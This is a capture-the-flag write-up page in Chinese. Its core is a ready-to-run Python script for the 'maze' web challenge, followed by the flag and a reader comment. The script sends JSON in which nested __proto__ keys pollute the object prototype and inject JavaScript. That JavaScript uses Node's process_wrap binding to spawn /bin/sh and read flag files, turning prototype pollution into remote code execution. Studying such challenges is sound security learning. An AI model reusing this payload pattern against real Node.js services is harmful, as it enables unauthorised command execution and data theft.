投稿赚金币

maze js原型链污染

hopeinhand 2023-11-27 15:56:31 723 0 

import requests
import json
import os

HOST = os.getenv("HOST", "82.157.146.43")
PORT = os.getenv("PORT", "16154")

js = """
var p = process.binding('process_wrap').Process;
var proc = new p();
proc.spawn({
  file: '/bin/sh',
  args: ['/bin/sh', '-c', '/bin/cat /flag*'],
  cwd: '/',
  stdio: [process.stdin, process.stdout, process.stderr]
});
""".replace("\n", "")

maze = {
    "map": [[0, 0], [0, 0]],
    "start": {
        "0": 0, "1": 0,
        "__proto__": {
            "__proto__": {
                "heap": "BinaryHeap(), function(){" + js + "}();//"
            }
        }
    },
    "goal": (1, 1),
    "heap": None
}

r = requests.post(f"http://{HOST}:{PORT}/solve",
                  headers = {"Content-Type": "application/json"},
                  data = json.dumps(maze))
print(r.text)


把HOST和PORT修改成环境对应的值,运行脚本就行了,flag为:

KosenCTF{fr0m_Array_prototype_pollution_t0_RCE}

分类:WEB
...
登录回复
评论
whiteHaves 3月前

佩服,高手做题,wp都不要金币,点赞,虽然wp看不懂

回复 0
image
作者:hopeinhand

7

提交

320

收入

相关WriteUP

  • sqli-0x1 Writeup

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • [HackINI-2022] lfi WriteUp

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • just-work-type

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • Fetus Web

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 8月前
  • post-the-get

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
问题反馈